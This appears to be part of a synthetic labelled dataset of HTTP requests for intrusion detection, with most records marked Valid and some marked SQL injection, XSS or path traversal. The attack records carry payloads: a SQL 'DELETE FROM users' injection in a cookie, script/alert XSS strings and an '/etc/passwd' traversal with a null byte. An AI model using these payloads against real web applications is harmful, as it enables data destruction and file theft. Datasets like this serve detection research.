Range: 03-,31-18005,845834-77348
Referer: /egntF0c/leor.js
TE: gzip;q=0.6
Trailer: Via
User-Agent: Mozilla/5.5 (compatible; Konqueror/3.7; Windows NT; gslhju; 2rbnelhe)
UA-CPU: 68000
UA-Disp: 1675,0086,32
UA-OS: Windows NT
UA-Color: color32
UA-Pixels: 848x029
Via: p5t/3.5 241.156.213.245, 1s7nhl/4.8 45.240.173.12
Transfer-Encoding: ee9is
Upgrade: qos/8.5, uhncee/1.8, heeaj/4.9, Eng9hD/1.7, teo/3.0
Warning: 739 www.M13tf.tiff "wbiCnlbr1oeamRa0" 
X-Forwarded-For: 168.48.15.93
X-Serial-Number: 510626783025324042
----: -------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 889
Start - Id: 19090
class: Valid
GET /a3lchdst/Esw_kSuWJ1H/czgD/sCmVdcq2vtrGtS@3UE/GpY_/fbvCPXJCetNHuZo/tTbnhhtlv.htm?ndylu=e.7aOdn6GUr&3IZrFj=1700443&erel9imebe=867182&2oiefa=n%2Bnl-sh+rl+aseigroup+byi&oaiZamayl=dieaed0lelula HTTP/1.0
Host: 54.26.142.115:2
Connection: close
Accept: */*
Accept-Charset: *
Accept-Encoding: deflate;q=0.6, compress, gzip;q=0.7
Accept-Language: o-cKdze;q=0.7
Cache-Control: max-age=424
Client-ip: 167.2.42.62
Cookie: rtns=190575;ns2qs97alotSia=Zant39ptYdlianqY;qy9gir75m=Stebxf;gtn=1033025;fmych=tttlietgiESgnzs;qoHJa=cbRpsh1-rl iObwwinnt91h
Cookie2: $Version="297"
Date: Mon, 27 Mar 06 09:16:19 GMT
ETag: W/"ybTiqqPUXJhv01KIDA9"
Expect: r1Defz
From: nun9o@s8ehqoner.cz
If-Modified-Since: Fri, 24 Feb 06 14:24:28 UTC
If-Unmodified-Since: Sat, 15 Sep 07 02:55:47 CET
If-Match: "5OOUb89e8pP3PAOsLGmm"
If-None-Match: "rrpjPDvzOdQgst@h"
If-Range: *
Max-Forwards: 3018
MIME-Version: 3.9
Pragma: jhttHs5='gtia'
Proxy-Authorization: e8w3T rr26=fpTqfott
Authorization: 7Islte aioymnx=eio6nt
Range: 2-4,83-,-0
Referer: /2Ea8hIsr/pusw.jsp
TE: trailers,gzip
Trailer: Accept-Charset
User-Agent: sLj8hPei (ix99XSAu; hrOoV8GTPP; drBaKufrf0; 9EBzxIhT)
UA-CPU: x86
UA-Disp: 603,8155,16
UA-OS: Windows 98
UA-Color: color16
UA-Pixels: 019x039
Via: 3.3 www.itegbh.png
Transfer-Encoding: identity
Upgrade: mTec5/5.9, iRo/8.2, 5e5e/7.4
Warning: 769 www.ynfoTewU.png "tyneuSih9ho" 
X-Forwarded-For: 31.76.137.109
X-Serial-Number: 594077
----: ----------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~

null

End - Id: 19090
Start - Id: 41289
class: SqlInjection
GET /mcOat6atf.php3?7b3n3wn4=hi%3B&hatefmjhtt8fiw=ehtgreuoyno&0NiedUrh=e%25us%26&9taiio=mts+mnE%25a%27enodeOTHo%7C%2F&nldlEptdn3=nZpph&F.httpZ@yH0_pphpxml=thc&t4uaehOCj=o3 HTTP/1.1
Host: www.2aegb.de
Connection: keep-alive
Accept: audio/x-wav, video/*, application/postscript;q=0.5
Accept-Charset: *;q=0.8
Accept-Encoding: gzip;q=0.5, identity
Accept-Language: *
Cache-Control: min-fresh=3982
Client-ip: 70.194.180.75
Cookie: rn=beyphpDamdwindow.openGbetweenm7;o83et=aqiy1'   );   DELETE    FROM    users  WHERE     upper(username)    =  upper(   'admin;tdulqao=ieWTR9i
Cookie2: $Version="05"
Date: Fri, 26 May 06 19:56:04 GMT
ETag: "a9kGi31HHfvP@LEN-pE"
Expect: hedo4h
From: aeorh1@neavalu.uk
If-Modified-Since: Tue, 29 Nov 05 05:21:53 CET
If-Unmodified-Since: Mon, 02 Mar 09 18:33:47 CET
If-Match: "Bo6f2R_3FyUv-QiUDNCQ"
If-None-Match: *
If-Range: "2yPe7bxpvacCaICbu9ZQ"
Max-Forwards: 8
MIME-Version: 8.7
Pragma: no-cache
Proxy-Authorization: dLgo omyaexl=hdrcn4ql
Authorization: eeh9vt ieHg=sut9o8o
Range: 9-769078
Referer: http://www.reia.fr/kmeeaw/whnhnN/erewEgl/lorrnteu/tyImoy.mdb
TE: trailers,chunked
Trailer: If-Unmodified-Since
User-Agent: Mozilla/1.2 (Machintosh; U; PPC 6.4; ev-ai; rv:2.1.5) Gecko/03675312
UA-CPU: MIPS
UA-Disp: 9646,8421,16
UA-OS: Windows NT
UA-Color: color8
Via: 3.9 216.190.213.3
Transfer-Encoding: gzip
Upgrade: tU5/4.7, t0e/4.3, aIbrw/2.1, hhrhs/1.6, xgnb/2.6
Warning: 890 www.09hohp.htm:781 "nrfY" 
X-Forwarded-For: 90.26.199.114
----: ----------------------------
~~~~~: ~~~~~~~~~~

null

End - Id: 41289
Start - Id: 41444
class: SqlInjection
POST /ete0isatsnasoM.jsp? HTTP/1.1
Content-Length: 381
Content-Language: gsm
Content-Encoding: gzip
Content-Location: /4tcHntd/desVlpd/7hntcM.pdf
Content-MD5: aWhTOWVuZWloZXJoZWlmZA==
Content-Type: application/x-www-form-urlencoded
Expires: Thu, 21 Apr 05 01:12:15 UTC
Last-Modified: Mon, 30 Nov 09 04:09:04 GMT
Host: www.gNdf1rgnFe.org
Connection: close
Accept: application/zip
Accept-Charset: *
Accept-Encoding: *;q=0.6
Accept-Language: e6odsA6-Sl, ry-niprrqa;q=0.6, gT0-h0oOr
Cache-Control: min-fresh=678
Client-ip: 166.4.252.29
Cookie: wiandwsts=8997733;puAEljhet=p/NreplaceSeannso$mrg;ea5ti57dp=:olikesswr nupdatelto&ey;X3NMU=gnysn;esrnQ47wnAuuo=vLc;2y=osock_streama
Cookie2: $Version="9"
Date: Fri, 21 Dec 07 10:41:14 CET
ETag: "leLIR_bfgo22sOQ"
Expect: wObo=kcnn
From: svetgtH@ellbmBnam.fr
If-Modified-Since: Mon, 06 Apr 09 21:14:19 GMT
If-Unmodified-Since: Tue, 06 Oct 09 09:16:45 UTC
If-Match: "hQHlhGNn.g4-JGb-j6"
If-None-Match: *
If-Range: "0IUH3NPlhheyaV1Rq"
Max-Forwards: 0
MIME-Version: 1.3
Pragma: no-cache
Proxy-Authorization: Digest uri=http://www.qaseCc.net/doze/ikttvm/5wrye.js
Authorization: Digest realm
Range: 78106-77620,1196-
Referer: http://www.tiseogAi.net/ydgr/sMgj.tar.gz
TE: deflate;q=0.2
Trailer: Date
User-Agent: Mozilla/9.8 (Windows; U; Windows NT 8.4; ew-fe; rv:7.1.8) Gecko/98009068
UA-CPU: MIPS
UA-Disp: 5047,1180,16
UA-OS: Mac OS X
UA-Color: color32
UA-Pixels: 738x118
Via: HTTP/4.8 14.7.10.11, 5.6 76.230.3.218, lka/0.4 www.ye7aetr.gif
Transfer-Encoding: compress
Upgrade: oin5s/2.1, itrt/4.7, tsm/7.1
Warning: 671 145.233.120.251 "tiua3dtweorond5gt" 
X-Forwarded-For: 243.251.179.229
X-Serial-Number: 9168693821015244526
----: -----------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

j3PBUtGD=8&g8Fr-execVkYt=ogNmH&0NMV8fsK0=jYBv2uEV&iiaee=aoe&7KqwLscriptwindow.opene=22148&eAmN=rvmZJ5md@OI&syai=lo9&S6passwdqbG=F&9iu6luhB3enlbO=e7dla&DrLwV='select  customer_phone  '||'from  customers   '||'where   customer_surname='''||  lv_surname||'''   and    customer_type=1';&mLCrcpc6LZhs=Atr&snncoedudnfim=i2i4'd-)usrwooy

End - Id: 41444
Start - Id: 46856
class: XSS
POST /hLQgwRWMsYUs7WHCi85/rbcHE4UXFkzk_a@An/gqyh1Xkd9eK7_s_X9/IrQddmP-KV-sC/op@8ch4tzi0PmbdLm9h/wCorMz62l9OFGNG/siopseo8asul4ieh33dV.tiff? HTTP/1.0
Content-Length: 154
Content-Language: qmh6
Content-Encoding: compress
Content-Location: /avAa1n/zsemepA.bin
Content-MD5: dGhyVG5mYWhlaG5tUnZidQ==
Content-Type: application/x-www-form-urlencoded
Expires: Tue, 18 Jul 06 08:10:49 GMT
Last-Modified: Thu, 14 Apr 05 17:03:15 CET
Host: www.siwetdo.org
Connection: close
Accept: image/png;q=0.0, audio/*, image/png;q=0.2
Accept-Charset: gb2312, ks_c_5601-1987;q=0.6, euc-jp;q=0.8
Accept-Encoding: *
Accept-Language: *
Cache-Control: wrTe='3ou9'
Client-ip: 213.98.235.52
Cookie: i8whe=9262271130;rhttqp8ekioiii=909946;ia3auhsEt=3tTs4 
Cookie2: $Version="134"
Date: Sat, 06 Oct 07 20:24:16 UTC
ETag: "HTJvF.2qTzNngibZ14mg"
Expect: 100-continue
From: eisopAa@s6qldnnaej.be
If-Modified-Since: Sun, 03 May 09 20:25:55 CET
If-Unmodified-Since: Thu, 25 Mar 10 22:18:32 CET
If-Match: *
If-None-Match: "Jl@GS3jH1ob.mO9Eauy8"
If-Range: Tue, 18 Aug 09 04:58:36 CET
Max-Forwards: 68
MIME-Version: 2.6
Pragma: khw=tsIeg
Proxy-Authorization: Basic Z2lleDplZHNvZHc=
Authorization: 30Mi x2Ljsisl=rnolxb
Range: 11334-,-933
Referer: http://www.7j5Stday.de/lTrr9kc/nhAu/CeGtlr/o5am/hcws.mp3
TE: gzip,trailers
Trailer: Referer
User-Agent: Mozilla/6.2 (compatible; hsBaf1et; Unix; tuninrssi)
UA-CPU: x86
UA-Disp: 457,6373,16
UA-OS: Windows 98
UA-Color: color32
UA-Pixels: 758x384
Via: 8.4 108.98.40.193, 9tei25/4.2 95.32.248.29:3614
Transfer-Encoding: gzip
Upgrade: ccSen/7.1
Warning: 762 95.205.191.87 "fohr1e" "Mon, 03 Aug 09 24:53:41 UTC"
X-Forwarded-For: 67.114.213.31
X-Serial-Number: 93268691782079750245
----: -------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

eeiHsvnad=c8Hv1KTB&KcatmE=[\xC0][\xBC]script  >[alert ('zeudrnz');][\xC0][\xBC]/script >&triplaOacoo=899381041

End - Id: 46856
Start - Id: 657
class: Valid
GET /estham1yN/sn7hlGeoliem/9WLD@B5QFRkYrcsZKQf4/sc4/U0-nullgb/aLmnWNDYUPL90aFyb/eie/aC-K_GQNQT12.mdb?tnotrpdortt=5613038&akmry3s26ownh=fer%3B%3E&yseuLynktAatyon=aO4NN&Bmftqhsrisl5msa=wesittotmv&ntcaE0snahy7=tinputedp&dedi=chbuHpheaphenohu&irtftm=180o8&3rsa7=hho%40c7-eoOZH&Rn=vt7s&HdpkPaccess_log=ix8mwn&gsDtne=97&9xmi0EeltR=a5Fx.S3grDe HTTP/1.0
Host: www.ibAoees.ch
Connection: close
Accept: text/*, text/*, audio/*
Accept-Charset: *
Accept-Encoding: gzip;q=0.0
Accept-Language: met-ndl, gcpn-brEy;q=0.4, sopne-n6, iio-xayzhn9l
Cache-Control: no-store
Client-ip: 98.101.91.241
Cookie: 3pnefhEtDflge=Cscript psystem;7c7=oAps;SLMall3ehttp3zk=o 2;ruimnj=n;6tfhho=ris3zcK6
Cookie2: $Version="55"
Date: Tue, 11 Mar 08 20:31:46 UTC
ETag: "RNXHDYZqCM6R@ZcfXOWO"
Expect: 100-continue
From: i4suSHw@tttnzs.org
If-Modified-Since: Tue, 11 Jan 05 23:23:57 UTC
If-Unmodified-Since: Fri, 04 Jul 08 24:06:51 CET
If-Match: *
If-None-Match: "4cs16MsCOVrRK.hs"
If-Range: ".8@ykB2.cM5LOOgCdV"
Max-Forwards: 4
MIME-Version: 3.8
Pragma: no-cache
Proxy-Authorization: peowun sr2Cl=UCat
Authorization: NTLM YW1uSTFOcjVybHJ0bXNpZW56aDE5bEdjbmRNNm5jb25pdE0=
Range: -7,9185-99305,64-211014
Referer: http://f5n4a4c.cz/Tnu1/y9pgnei/dmafouj.png
TE: deflate;q=0.5,gzip;q=0.1,deflate
Trailer: Expect
User-Agent: Mozilla/9.8 (Windows; U; Windows NT 0.4; 0u-it; rv:0.0.7) Gecko/82960824
UA-CPU: MIPS
UA-Disp: 7551,458,32
UA-OS: Win95
UA-Color: color8
UA-Pixels: 0578x134
Via: 9.2 www.rNn2nhfs.gif, FTP/1.8 100.54.15.173
Transfer-Encoding: identity
Upgrade: cIre/5.3
Warning: 822 www.doik.shtml:3 "omlq" "Sat, 28 Aug 04 02:17:50 UTC"
X-Forwarded-For: 165.15.81.251
X-Serial-Number: 541499677250739
----: ----------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 657
Start - Id: 8457
class: Valid
GET /s86XfLQYgivbdM4BZq9/9onr/sr5dR4EzN/sT@.g.bin?2z=EiepbIidkehd&Wu_ZY=hoOiU.5 HTTP/1.0
Host: 82.163.42.141
Connection: keep-alive
Accept: */*;q=0.5
Accept-Charset: x-mac-japanese;q=0.3, iso-8859-6;q=0.7, windows-1257, cp-932;q=0.1, euc-tw;q=0.9
Accept-Encoding: *;q=0.6
Accept-Language: hIdzrH-uet, vv6rthtc-se;q=0.8, ato-tsshr, ydRz5-eehl, 2ycc6-lnhnhoan;q=0.3
Cache-Control: max-stale
Client-ip: 187.200.25.88
Cookie: hhtiyab=sKDrO9tiC;lpgeeiNGeteehto=d6rKj;0aWBWVMKkYcd4=tu6
Cookie2: $Version="98"
Date: Sat, 31 Dec 05 12:26:42 UTC
ETag: "0Vhekwo1Ucfy05R-l"
Expect: 100-continue
From: lraeI@n6eai.de
If-Modified-Since: Fri, 25 Jan 08 03:50:08 UTC
If-Unmodified-Since: Mon, 20 Oct 08 02:40:43 CET
If-Match: *
If-None-Match: *
If-Range: ".qt2_zPOxyoa1_du"
Max-Forwards: 301
MIME-Version: 9.2
Pragma: awvrllt5='tsehd'
Proxy-Authorization: rahe cmte4Hz=rntcz1cz
Authorization: Basic Q3NybzphZWV0
Range: -41709
Referer: http://ihstve3t.it/eekitoht/ryel0h/fc39ip/teasrpnt/ef1te.bin
TE: trailers,gzip,gzip;q=0.0
Trailer: If-Unmodified-Since
User-Agent: Mozilla/8.5 (Machintosh; U; PPC Mac OS X 2.9; bM-ux; rv:3.9.7) Gecko/35819719
UA-CPU: Sparc
UA-Disp: 3788,441,16
UA-OS: Win95
UA-Color: color32
UA-Pixels: 3083x039
Via: ow1s/3.9 10.69.144.230, 7.9 217.71.153.75
Transfer-Encoding: gzip
Upgrade: eht/0.1, daroy/6.1, dh2hn/7.4, 6nar/5.6
Warning: 701 www.efiqn.jpg "h2nh5chdrzlef" "Mon, 14 Feb 05 17:53:20 CET"
X-Forwarded-For: 24.38.239.223
X-Serial-Number: 3858691762
----: --------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 8457
Start - Id: 14597
class: Valid
GET /vebrrrrde5munMti/jy.jpg?liSadai=fnCHJpo HTTP/1.0
Host: www.ltssn.st
Connection: keep-alive
Accept: */*
Accept-Charset: *;q=0.7
Accept-Encoding: 
Accept-Language: azantr0-nig, lNliQEcf-np9s7ut
Cache-Control: max-stale
Client-ip: 24.117.75.187
Cookie: 9etelNelce=)e4uot(Bazynd;tcO0=93683072;ni5A=e1r;err8iitih=0585;eooau7ctzkMlcv=aC;rTg=o@tr
Cookie2: $Version="819"
Date: Wed, 04 Aug 04 18:57:07 CET
ETag: "MYbLbQIZA_7fSoUgb@IW"
Expect: HgEdii=4rzw2ll
From: es2ntogi@en5eitt1.de
If-Modified-Since: Fri, 05 Mar 04 11:27:47 GMT
If-Unmodified-Since: Sat, 08 Mar 08 16:16:24 UTC
If-Match: *
If-None-Match: "QZVHf70Mhe_7M0yfwO"
If-Range: *
Max-Forwards: 2155
MIME-Version: 0.7
Pragma: no-cache
Proxy-Authorization: H5bm be3dbise=tmssi
Authorization: Basic bm1udHNhOmVyeWk=
Range: 45-4785,-21867,70176-3030
Referer: http://www.canf.ch/eefsqes/enEr/avBaBehn.doc
TE: trailers
Trailer: User-Agent
User-Agent: yiioutrdnc (tGNT9A; whmvC16)
UA-CPU: Sparc
UA-Disp: 1652,237,16
UA-OS: WinNT
UA-Color: color16
UA-Pixels: 042x922
Via: 2.6 www.rphgmh.htm
Transfer-Encoding: bkee; rDfdel=yato
Upgrade: aAup/3.4, wlhsoh/9.7, nbao/4.6
Warning: 070 www.7a8dwsii.html "svtOooelCswy" "Tue, 02 Mar 10 22:43:31 CET"
X-Forwarded-For: 214.165.29.201
X-Serial-Number: 12480
----: -----------------
~~~~~: ~~~~~~~~~~~~~~~

null

End - Id: 14597
Start - Id: 46079
class: PathTransversal
PUT /MtrelnEso5oongqon/pform0/NBoerSwfNar/txxIo1.gWVishN/abt68tfooryjqr2ette.mdb? HTTP/1.0
Content-Length: 144
Content-Language: b,akh,t
Content-Encoding: gzip
Content-Location: http://www.2huahnsd.cz/cert/wnsa/e3dijh/nisn.mspx
Content-MD5: dGVhZGQ3dHVvdG5zbGVtaQ==
Content-Type: application/x-www-form-urlencoded
Last-Modified: Sat, 10 Jul 04 17:10:53 GMT
Host: www.ptieo2sse.ch
Connection: ntprr
Accept: */*
Accept-Charset: windows-1253
Accept-Encoding: 
Accept-Language: *
Cache-Control: max-age=7308
Cookie: mginl=wo;Kbin9IweU9wy=57
Cookie2: $Version="9"
Date: Tue, 09 Jun 09 06:02:31 UTC
Expect: etctA7v=4nygoels
If-Modified-Since: Sat, 23 Sep 06 03:44:27 GMT
If-Unmodified-Since: Thu, 15 Sep 05 17:56:11 GMT
If-Match: "HYBHNWUjCqtD_5z"
If-None-Match: *
If-Range: Mon, 07 Feb 05 15:11:10 CET
Max-Forwards: 1154
MIME-Version: 4.9
Pragma: no-cache
Proxy-Authorization: NttB gehr=eat7esoo
Authorization: laGs oROeH=utbwE3
Referer: /E2I3ehe/asfoe/emdujeb/s0lrrwn.jpg
TE: trailers,trailers
User-Agent: Mozilla/8.3 (Machintosh; U; PPC 5.5; tr-hs; rv:9.9.9) Gecko/34241571
Via: 3.2 114.54.117.38
Transfer-Encoding: identity
X-Forwarded-For: 169.44.253.54
X-Serial-Number: 3193493640489
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~

iye=739&f1@W2OM_@DyL=\.\.\/\.\.\/\.\.\/\.\.\/\.\.\/\.\.\/\.\.\/etc\/passwd%00.html

End - Id: 46079
Start - Id: 19882
class: Valid
GET /tueiyegonoa/ovYDUFJW@/9n/Dieerctog6wosdtaRse/i5ndn9ny.pl?teiTecu=onhtpassxp_gunionan6nphpdocumentm&TU2=85903&a49n8=nortbrRieeiirlrtho&7a=tst+n5a&LFLcmdprocessing-instructionsqV=nJzoLSZaHN2&NTdtrlrdbd8jao=las&Lexf=nreoh5eaiohntFsbt7&1ame=at9selDre9nce&Srp20t=duScC09&1iwidxBUeH8position=2&FfubyM5os=i HTTP/1.0
Host: www.teAoip.it
Connection: close
Accept: */*
Accept-Charset: windows-1258, windows-1250, x-mac-korean;q=0.2, iso-8859-15;q=0.6, x-mac-turkish;q=0.1
Accept-Encoding: gzip, identity
Accept-Language: KitCmj-xo03;q=0.1, te-yoesn
Cache-Control: no-transform
Client-ip: 80.193.119.62
Cookie: inrE=i2aWricormyd;DdTdEfejsrsnt=xUKZq@;elny=rtd
Cookie2: $Version="70"
Date: Fri, 12 Sep 08 09:08:41 GMT
ETag: "ylFp1e@@p02JqW5p"
Expect: etaa=zrsedon
From: 0nO7ys@itae.cz
If-Modified-Since: Fri, 10 Feb 06 15:32:33 CET
If-Unmodified-Since: Tue, 08 Jul 08 09:42:20 UTC
If-Match: *
If-None-Match: "1FNqev2waV94TI.4"
If-Range: *
Max-Forwards: 199
MIME-Version: 6.7
Pragma: o7='rrttN'
Proxy-Authorization: tIsore haesemqr=7tm5
Authorization: Basic cm9hbjphcm9xcjlzRQ==
Range: 2-
Referer: http://2edefeni.com/ixecRo/2etorsA.jsp
TE: trailers,gzip
Trailer: Authorization
User-Agent: Mozilla/0.0 (Machintosh; U; PPC 6.2; cE-La; rv:2.5.1) Gecko/37101098
UA-CPU: MIPS
UA-Disp: 1517,0390,16
UA-OS: Win95
UA-Color: color32
UA-Pixels: 205x6501
Via: nfq/2.6 www.wenta.jpg
Transfer-Encoding: deflate
Upgrade: aSn/7.4
Warning: 796 165.248.243.125:49 "nsa0mTYgni7ti" "Wed, 31 Mar 10 02:21:30 UTC"
X-Forwarded-For: 176.249.106.242
X-Serial-Number: 11565952861690
----: --------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 19882
Start - Id: 8879
class: Valid
GET /pdssihr/7Efdf/tA/qZ0fCyc/1shiThe/tLM1DB@Y99nfV8wen/T1ig4HoTa/ndaienE6L/t3n7hQwusIfvfet7/.XOqYNXTnIl2j.php4?w9=46019111&hhDiaeoe=6&COGQ=%5D&io7sh=qauet7ufpi&atxrle=128458&edutlciimseoru=45946276&zSboMOreplaced_iX=estdin88otandxewgety%40hlinkr%5Dxj%3F&rda7zmHE=g%7Elsboot.initpeleTttashsexeca0&hiowndia=hscriptchrenbstotalikeehjOo&qiakstagsibrh=e%29tqsWss&8d4t5isnet=4 HTTP/1.0
Host: www.nlsw.be
Connection: yeeooEDe
Accept: */*
Accept-Charset: *
Accept-Encoding: *
Accept-Language: *;q=0.1
Cache-Control: no-cache
Client-ip: 36.44.215.228
Cookie: iahYdhD=Eh;tdw34cto=dt?5twf;rtinr=w ee>vhhphpbodyWce;abo=1GE1arY
Cookie2: $Version="1"
Date: Fri, 29 Jun 07 22:57:14 GMT
ETag: "gk1RxozSldqS1ixREt"
Expect: 100-continue
From: e9ioSmhn@umuDc.biz
If-Modified-Since: Fri, 23 Jun 06 24:13:18 GMT
If-Unmodified-Since: Thu, 05 Feb 04 20:34:00 GMT
If-Match: *
If-None-Match: "9SfFhpkIDIo_pFR"
If-Range: *
Max-Forwards: 3624
MIME-Version: 7.4
Pragma: csio='t'
Proxy-Authorization: NTLM dHNyVHYxaGZzYmZhanJidG91N3NManJUbGhpaG5pc25pd2N0YXM=
Authorization: NTLM am9jV3NsRUR5czhpNTBjaTZvY3lvZG9TaW1obG90ZUQ4aQ==
Range: 85-
Referer: http://www.etTseaae.de/nhkkeci/eDsa.gif
TE: trailers
Trailer: Expect
User-Agent: esakest (uB1QNEpVd)
UA-CPU: Sparc
UA-Disp: 012,690,16
UA-OS: Win98
UA-Color: color8
UA-Pixels: 3568x0188
Via: FTP/0.5 59.190.96.49
Transfer-Encoding: i8tt9i; dee3at=eHtysi
Upgrade: rudtA/2.1, e5r/5.2, Ndas/0.8, iomgfE/7.8
Warning: 595 34.218.228.95 "fFoep9Eetebeekisett" "Mon, 07 Jun 04 13:30:19 CET"
X-Forwarded-For: 38.43.108.176
X-Serial-Number: 8434759512
----: -------------
~~~~~: ~~~~~~~~~~~~

null

End - Id: 8879
Start - Id: 11082
class: Valid
GET /hzS5nyGHitjOMof@7/t0dKps@Ek2Md2Gf/wAys3hm5AGXCbuk4f2/g-0/m_/tfm1E6q1oA/O0orEZEnODgH./3Q6N/tExjK/lRlWCdCXvGQxOBUKg.shtml?EbeFNlPhDdpx=sdueystecSsystemdeleteeshutdowncatmLe4d&ebluSje=uiRdlalrC4kNm4t&eeawe=e5ttK9&CLtMN6F1InIp=17&group byO.7-oXvc=na+cxml&dyadsmtlt3o=1gwindow.openibetween1nitte&zwscirnaoni6hkh=rrcitins&ter5od=44778735&ntiolsNtfs=TsOg%3Da&arvussr6i4y4=664460239&xcoHht8nonUwec=n&6clo8FE=63513&yYc438tlE=8aif&nxgmazaeeen6pt=yh%3Dnode%5Cnn+rsslM&edOlisblsciEn=tstswtt HTTP/1.0
Host: www.5ddsu.biz
Connection: keep-alive
Accept: text/*, image/png;q=0.1
Accept-Charset: *
Accept-Encoding: 
Accept-Language: *
Cache-Control: gtT3e=mR
Client-ip: 214.74.209.201
Cookie: srEemttinsre=3;hmN7go3iwwar7b=m;haunneohsg=RTlikedroptr/LorvsNupdatet
Cookie2: $Version="36"
Date: Tue, 14 Nov 06 10:06:51 CET
ETag: "HuunF4J5lrRhWPm-O5W"
Expect: 100-continue
From: ieonn@sehlybt.net
If-Modified-Since: Tue, 27 Apr 10 15:15:37 GMT
If-Unmodified-Since: Tue, 20 Nov 07 13:36:41 GMT
If-Match: *
If-None-Match: *
If-Range: "CioPEEvGHs6.LA6_WP0Z"
Max-Forwards: 4
MIME-Version: 8.1
Pragma: no-cache
Proxy-Authorization: Digest cnonce="ke4a"
Authorization: Digest nonce
Range: 62259-
Referer: http://www.cr68ir.biz/fe5pSVat/eic4acve/ihtexsod/dxdevt3i.nsf
TE: trailers
Trailer: Accept-Language
User-Agent: Mozilla/6.9 (X11; U; Unix 0.6; et-0n; rv:4.7.4) Gecko/07591479
UA-CPU: PowerPC
UA-Disp: 0717,4017,8
UA-OS: FreeBSD
UA-Color: color8
UA-Pixels: 948x5637
Via: HTTP/8.1 41.169.95.206
Transfer-Encoding: gzip
Upgrade: LwEo4c/2.4, leari/4.2, haaiy/0.9
Warning: 798 www.leeOy.tiff "xtasHAn" 
X-Forwarded-For: 199.237.53.206
X-Serial-Number: 881023416032
----: ------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~

null

End - Id: 11082
Start - Id: 47948
class: XSS
GET /iDP59SN_fQkvRTDJ/irybbo7aoaoe/astytPwcHcN/tnel1ndeeo/RirE/dP5X9T/EAFWV3zvu3m.htm?yAfw=%3Cxml+++id+++%3D++++%22+X+++++%22%3E%3Ca++%3E%3Cb+%3E%26lt%3Bscript%3E%5Balert+++%28%27itai3h%27%29%3B%5D%26lt%3B%2Fscript++%3E%3B%3C%2Fb+%3E%3C%2Fa+%3E%3C%2Fxml%3E&ZrGIGB_=rssdbT90&EOAzP=t_bz&wD3rS=e1vXf2H&reantL=8704893&-shutdownBPvYPcopy=ritnpavnstf+&6qjM1N=99&vr9tb2xbNb=+aoetzhtso%29wcEe&ar=etTiwxlqdug2deva&icsaldoel=a95kpkM0&cTsdliA=p_6NKgp%405h&IlKj=9808070&araehops=openN%3BIeiarnph-9l HTTP/1.1
Host: 131.109.118.20
Connection: l1mwort
Accept: */*
Accept-Charset: *;q=0.8
Accept-Encoding: 
Accept-Language: AVlded-mjslyiha
Cache-Control: no-transform
Client-ip: 55.58.52.249
Cookie: zun=o$ 
Cookie2: $Version="771"
Date: Mon, 06 Nov 06 04:03:31 GMT
ETag: "lT7Ksneo3lP4TiG"
Expect: 100-continue
From: Eawmtren@tifsCoeGen.net
If-Modified-Since: Sun, 18 Feb 07 05:49:19 GMT
If-Unmodified-Since: Fri, 20 Feb 09 06:47:35 GMT
If-Match: "b5yj9YO-qHQHzz.Edad"
If-None-Match: "1J-mqZ5_IBssu9kXYA"
If-Range: *
Max-Forwards: 28
MIME-Version: 2.0
Pragma: Rors=adntg
Proxy-Authorization: mbntn edar=HBooepu
Authorization: Digest nc=D3344DE4
Range: -162,92-
Referer: /crognoo/zteoiai.cfm
TE: deflate,trailers
Trailer: Max-Forwards
User-Agent: Mozilla/9.5 (Windows; U; Windows NT 9.8; pe-ea; rv:6.0.1) Gecko/51522653
UA-CPU: Sparc
UA-Disp: 216,2039,8
UA-OS: Win95
UA-Color: color32
UA-Pixels: 5386x6954
Via: FTP/7.1 111.194.175.184
Transfer-Encoding: deflate
Upgrade: cho/4.7, fss/8.0, m4ety/0.5, r4gd/1.6
Warning: 644 www.h7jist.js:4 "esfqduza4efrwceom" 
X-Forwarded-For: 108.243.93.109
X-Serial-Number: 91293701405226650926
----: -----------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 47948
Start - Id: 79
class: Valid
GET /Iaantmpn/otrmrtw.gif?hngealmekls=m%2Bnlnf%27&YvNJform=eAWh&deo4ra=dih- HTTP/1.0
Host: 232.104.69.182
Connection: ainyoj
Accept: video/mpeg;q=0.8
Accept-Charset: *;q=0.3
Accept-Encoding: 
Accept-Language: *
Cache-Control: no-store
Client-ip: 91.171.86.36
Cookie: Bmpvll8oqy=8496;aapdqdbx=tENuu;tldtihp=uhduol3eratt;ugtttrsosh= t6gusystemstdineix/gaeahttps
Cookie2: $Version="49"
Date: Fri, 09 Jan 04 22:49:07 UTC
ETag: W/"R3e8YMO14FGC9C2tMyao"
Expect: 100-continue
From: hhfiYtat@W0diMywt.it
If-Modified-Since: Mon, 22 Mar 04 07:01:58 GMT
If-Unmodified-Since: Fri, 27 Apr 07 24:50:54 CET
If-Match: "Vscl-KSB1pEKcJ_g"
If-None-Match: "7j6LsF6VpH5p_SaTd"
If-Range: "8L9xwygp-q3.164Wq"
Max-Forwards: 780
MIME-Version: 0.0
Pragma: no-cache
Proxy-Authorization: Digest uri=/5Eth/NasEi/4flTue17/eeiv/xfrHtst7.gz
Authorization: iado Ohuo=aep4n
Range: 41396-563,553741-
Referer: /ea8euS/jh5t/6eaEdi/ivdleMf.php
TE: chunked;q=0.8
Trailer: Date
User-Agent: sjwW7c1 http://www.iqi3pTte.st
UA-CPU: MIPS
UA-Disp: 4994,968,32
UA-OS: Windows NT
UA-Color: color8
UA-Pixels: 5749x1102
Via: FTP/5.5 15.31.80.191
Transfer-Encoding: deflate
Upgrade: plohnd/1.0
Warning: 754 165.186.54.133:11 "ceaa7ahtoenmn" 
X-Forwarded-For: 28.137.198.105
X-Serial-Number: 365994
----: ----------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 79
Start - Id: 27622
class: Valid
